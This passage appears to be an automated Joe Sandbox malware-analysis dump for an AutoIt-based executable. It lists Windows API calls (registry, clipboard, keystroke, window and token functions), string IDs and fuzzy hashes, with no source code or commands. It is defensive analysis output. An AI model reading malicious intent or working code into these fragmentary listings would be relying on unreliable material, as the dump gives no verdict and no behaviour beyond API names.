                                                                                            • Part of subcall function 00007FF74D052D5C: MapVirtualKeyW.USER32(?,?,?,00007FF74D037FA5), ref: 00007FF74D052D8E
                                                                                            • Part of subcall function 00007FF74D052D5C: MapVirtualKeyW.USER32(?,?,?,00007FF74D037FA5), ref: 00007FF74D052D9C
                                                                                            • Part of subcall function 00007FF74D052D5C: MapVirtualKeyW.USER32(?,?,?,00007FF74D037FA5), ref: 00007FF74D052DAC
                                                                                            • Part of subcall function 00007FF74D052D5C: MapVirtualKeyW.USER32(?,?,?,00007FF74D037FA5), ref: 00007FF74D052DBC
                                                                                            • Part of subcall function 00007FF74D052D5C: MapVirtualKeyW.USER32(?,?,?,00007FF74D037FA5), ref: 00007FF74D052DCA
                                                                                            • Part of subcall function 00007FF74D052D5C: MapVirtualKeyW.USER32(?,?,?,00007FF74D037FA5), ref: 00007FF74D052DD8
                                                                                            • Part of subcall function 00007FF74D04EEC8: RegisterWindowMessageW.USER32 ref: 00007FF74D04EF76
                                                                                          • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF74D03106D), ref: 00007FF74D038209
                                                                                          • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF74D03106D), ref: 00007FF74D03828F
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF74D03106D), ref: 00007FF74D07D36A
                                                                                          Similarity
                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                          • String ID: AutoIt

                                                                                          Similarity
                                                                                          • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                          • String ID: Line:
                                                                                          APIs
                                                                                          • GetOpenFileNameW.COMDLG32 ref: 00007FF74D07BAA2
                                                                                            • Part of subcall function 00007FF74D0356D4: GetFullPathNameW.KERNEL32(?,00007FF74D0356C1,?,00007FF74D037A0C,?,?,?,00007FF74D03109E), ref: 00007FF74D0356FF
                                                                                            • Part of subcall function 00007FF74D033EB4: GetLongPathNameW.KERNELBASE ref: 00007FF74D033ED8
                                                                                          Similarity
                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                          • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                          Similarity
                                                                                          • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF74D036F52,?,?,?,?,?,?,00007FF74D03782C), ref: 00007FF74D036FA5
                                                                                          • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF74D036F52,?,?,?,?,?,?,00007FF74D03782C), ref: 00007FF74D036FD3
                                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF74D036F52,?,?,?,?,?,?,00007FF74D03782C), ref: 00007FF74D036FFA
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer
                                                                                          • String ID: CALL
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          Similarity
                                                                                          • API ID: Library$Load$AddressFreeProc
                                                                                          Similarity
                                                                                          • API ID: IconNotifyShell_
                                                                                          • String ID:
                                                                                          • API String ID: 1144537725-0
                                                                                          • Opcode ID: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                                          • Instruction ID: 96a2c9706043b31c19335d38db5e65fadc70c379e5e3c156085f6bb643c3ac61
                                                                                          • Opcode Fuzzy Hash: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                                          • Instruction Fuzzy Hash: CA415931A0CB86C6E755BF11E4403A9A3A4FB48B88F844535DE8D177A9EFBDE240C720
                                                                                          APIs
                                                                                          • IsThemeActive.UXTHEME ref: 00007FF74D033756
                                                                                            • Part of subcall function 00007FF74D059334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF74D059348
                                                                                            • Part of subcall function 00007FF74D0336E8: SystemParametersInfoW.USER32 ref: 00007FF74D033705
                                                                                            • Part of subcall function 00007FF74D0336E8: SystemParametersInfoW.USER32 ref: 00007FF74D033725
                                                                                            • Part of subcall function 00007FF74D0337B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D0337F2
                                                                                            • Part of subcall function 00007FF74D0337B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D033807
                                                                                            • Part of subcall function 00007FF74D0337B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D03388D
                                                                                            • Part of subcall function 00007FF74D0337B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D033924
                                                                                          • SystemParametersInfoW.USER32 ref: 00007FF74D033797
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 4207566314-0
                                                                                          • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                                          • Instruction ID: c782c179367edd5244b3c4bfb68a78ff15aded1e1a797c011a8a679b474dcb20
                                                                                          • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                                          • Instruction Fuzzy Hash: 900124A0E0C243CAF724FB61B854278E261AF08300FC64135D8CC972B2FE7EA4848B60
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 485612231-0
                                                                                          • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                                          • Instruction ID: 7c2faadbd345c4f22bbe78bf15d47c8918ae65e4c4ed662237921e58f0bbc60a
                                                                                          • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                                          • Instruction Fuzzy Hash: C3E08C51F0D507C2FF18BBF2A81D278A291AF58B40BC44438C88D8B272FE2CE4854A20
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseErrorHandleLast
                                                                                          • String ID:
                                                                                          • API String ID: 918212764-0
                                                                                          • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                                          • Instruction ID: 4936827f18dff1cdc9366c97f72691d41f5643076bb06082c5fe06e12d0b7b82
                                                                                          • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                                          • Instruction Fuzzy Hash: AD11EC51B0C243C1FEA477A4A59837D91D15F54764FC40339DA9E0B3F2FD6CE4414221
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer
                                                                                          • String ID:
                                                                                          • API String ID: 1385522511-0
                                                                                          • Opcode ID: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
                                                                                          • Instruction ID: 27d8204bc3f71c294c8556903d84f253c8d703969e2cf68e9ebcfd6ca30cbdb8
                                                                                          • Opcode Fuzzy Hash: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
                                                                                          • Instruction Fuzzy Hash: 5832AE22A0C692C6EB60FB15D4486BDA7A1EB84B84FD48135DE8E077B5FF3DE4418721
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClearVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1473721057-0
                                                                                          • Opcode ID: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                                                          • Instruction ID: 5a7093de33f9a9730cb8017ff509132a20e12d1db572b6bf2bb99fa0db85f179
                                                                                          • Opcode Fuzzy Hash: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                                                          • Instruction Fuzzy Hash: 7C418926B0CA41C6EB10FF60D0547ACA7A1EB44B88F844535CE8D177AAEFB8E495C760
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                          • String ID:
                                                                                          • API String ID: 3947729631-0
                                                                                          • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                                          • Instruction ID: 40e1f02d31cd6d481dda922bd58eb8a1e150be0557c17cf57c649d39a19eb335
                                                                                          • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                                          • Instruction Fuzzy Hash: 5E41AE21E0C653C6EA64FB14F86027CA261AF45750FC6593ADE8E076E2FE3DE841C760
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                                          • Instruction ID: 0152340af708664ccf5f59a42fa2d653f49e5c12c5bf3f84231fa3a678aa3987
                                                                                          • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                                          • Instruction Fuzzy Hash: 2E21A932F1C642C7D795BF25E450379B6A1EB84B94F944234DA9E8B6E5EF2CD800C710
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                                          • Instruction ID: feb8d1fcaa0466fd5880a304d2b9ea1c6a2a4b7ca58ce09e1fcd1df8b325f5f6
                                                                                          • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                                          • Instruction Fuzzy Hash: F4218321B0C682C5EB61BF91941017ED2A5FF45B84F944031EACC57BA6FF7CD9518760
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
                                                                                          • Instruction ID: 2a415bbec5d9ca20a15affe694da8f9cb48d053ab7a95f68eb235ac08800cbe0
                                                                                          • Opcode Fuzzy Hash: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
                                                                                          • Instruction Fuzzy Hash: DD111C32B1C783C6F620BF95A44467DE6A6FB44380F954435EACD476A6FF2CE8518B20
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF74D064970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF74D064999
                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF74D07C8FE), ref: 00007FF74D03656F
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3938577545-0
                                                                                          APIs
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF74D054C5C
                                                                                            • Part of subcall function 00007FF74D055600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF74D055609
                                                                                            • Part of subcall function 00007FF74D055600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF74D05561A
                                                                                          Similarity
                                                                                          • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                                          • String ID:
                                                                                          • API String ID: 1680350287-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: FileWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3934441357-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: LongNamePath
                                                                                          • String ID:
                                                                                          • API String ID: 82841172-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: IconNotifyShell_
                                                                                          • String ID:
                                                                                          • API String ID: 1144537725-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Open_onexit
                                                                                          • String ID:
                                                                                          • API String ID: 3030063568-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: _onexit
                                                                                          • String ID:
                                                                                          • API String ID: 572287377-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: _onexit
                                                                                          • String ID:
                                                                                          • API String ID: 572287377-0
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentVersionWow64_onexit
                                                                                          • String ID:
                                                                                          • API String ID: 2932345936-0
                                                                                          Similarity
                                                                                          • API ID: ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 1452528299-0
                                                                                          Similarity
                                                                                          • API ID: AllocHeap
                                                                                          • String ID:
                                                                                          • API String ID: 4292702814-0
                                                                                          Similarity
                                                                                          • API ID: AllocHeap
                                                                                          • String ID:
                                                                                          • API String ID: 4292702814-0
                                                                                          Similarity
                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                          • API String ID: 2211948467-2373415609
                                                                                          Similarity
                                                                                          • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                                          • String ID: P
                                                                                          • API String ID: 1208186926-3110715001
                                                                                          Similarity
                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                          • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                          • API String ID: 2910397461-2439800395
                                                                                          Similarity
                                                                                          • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                          • String ID: Shell_TrayWnd
                                                                                          • API String ID: 3778422247-2988720461
                                                                                          Similarity
                                                                                          • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                          • String ID:
                                                                                          • API String ID: 3372153169-0
                                                                                          Similarity
                                                                                          • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                                          • String ID: default$winsta0$winsta0\default
                                                                                          • API String ID: 3202303201-1423368268
                                                                                          Similarity
                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                          • String ID: AutoIt v3 GUI
                                                                                          • API String ID: 1458621304-248962490
                                                                                          • Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                                          • Instruction ID: fea045a4605ffa7f17e163dd6bbf12e6a4140e56752eeeb171ed9016b5361de0
                                                                                          • Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                                          • Instruction Fuzzy Hash: B3D16B32A0CA46CAE714FF39E8547A977A1FB48B58F900235DA4E57AA4EF78E444C710
                                                                                          Similarity
                                                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                          • String ID:
                                                                                          • API String ID: 3222323430-0
                                                                                          • Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                                          • Instruction ID: d9b6a3bcd98988d252ef06067aabd8714aa41e5dfe6f3771fb4b26713d42268f
                                                                                          • Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                                          • Instruction Fuzzy Hash: 3D711B22B0DA46C2EA14BB55D9583BCA361BF88B84FC44435D98E476B1FF6CE606C760
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                                          • String ID:
                                                                                          • API String ID: 1015379403-0
                                                                                          • Opcode ID: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                                                          • Instruction ID: e00732925c00fddfa4d8e65703fe11bcad20b24bcebf895005057118d4aa94ca
                                                                                          • Opcode Fuzzy Hash: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                                                          • Instruction Fuzzy Hash: 9802D731A0C686C5EB20BF2194186BDA761FF88794F944632DAED07AE4EF3CE541C724
                                                                                          Similarity
                                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                                          • String ID:
                                                                                          • API String ID: 3215588206-0
                                                                                          • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                          • Instruction ID: bf3030d55833d54411bab767e51b711bc77cd748a3633fc4abf5de8e06c16512
                                                                                          • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                          • Instruction Fuzzy Hash: F7513A32A0CB02CAEB4CEB64E45C27D73A1EB49744F544839DA8E83BA4EE7CE4558354
                                                                                          Similarity
                                                                                          • API ID: CloseValue$ConnectCreateRegistry
                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                          • API String ID: 3314541760-966354055
                                                                                          • Opcode ID: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                                                          • Instruction ID: 9fdda5010731194d6a13e42ac936adfcfe34c783b8994b0a5043ca07ca04d278
                                                                                          • Opcode Fuzzy Hash: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                                                          • Instruction Fuzzy Hash: DE026326B0CA42C6EB10FF26D4512ADB764FB88F84B859432DE8D47766EF38E445C760
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: P
                                                                                          • API String ID: 0-3110715001
                                                                                          • Opcode ID: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                          • Instruction ID: 7c3e962629307936ba5ad14b986d84bedb048b572a8d2f5bc5570124538c4219
                                                                                          • Opcode Fuzzy Hash: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                          • Instruction Fuzzy Hash: 74A17F32A0C641CAE724FF26D4586BAF760FB84788F948135DA9E07AA4EF7CE545C710
                                                                                          Similarity
                                                                                          • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                          • String ID: -$:$:$?
                                                                                          • API String ID: 3440502458-92861585
                                                                                          • Opcode ID: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                                          • Instruction ID: a3739b79456a53945962a544e8477e52f4a1b74680c6e68f449bb9a9d2c40395
                                                                                          • Opcode Fuzzy Hash: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                                          • Instruction Fuzzy Hash: 7DE1D572A0C282C6E764FF35A8506B9AB91FF84784FC45135EA8D4BAA5EF3CD4418720
                                                                                          Similarity
                                                                                          • API ID: Time$File$FindLocalSystem$CloseFirst
